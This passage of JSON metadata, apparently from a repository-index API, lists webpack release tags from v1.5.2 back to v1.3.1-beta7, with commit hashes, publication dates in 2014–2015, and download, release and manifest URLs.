"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"